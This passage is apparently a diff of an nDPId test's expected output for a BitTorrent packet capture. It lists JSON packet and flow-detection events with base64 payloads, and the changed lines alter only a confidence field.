00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="} 
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="} 01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAAAFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="} 
01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAFBAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="} 
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="} 01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="} 
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 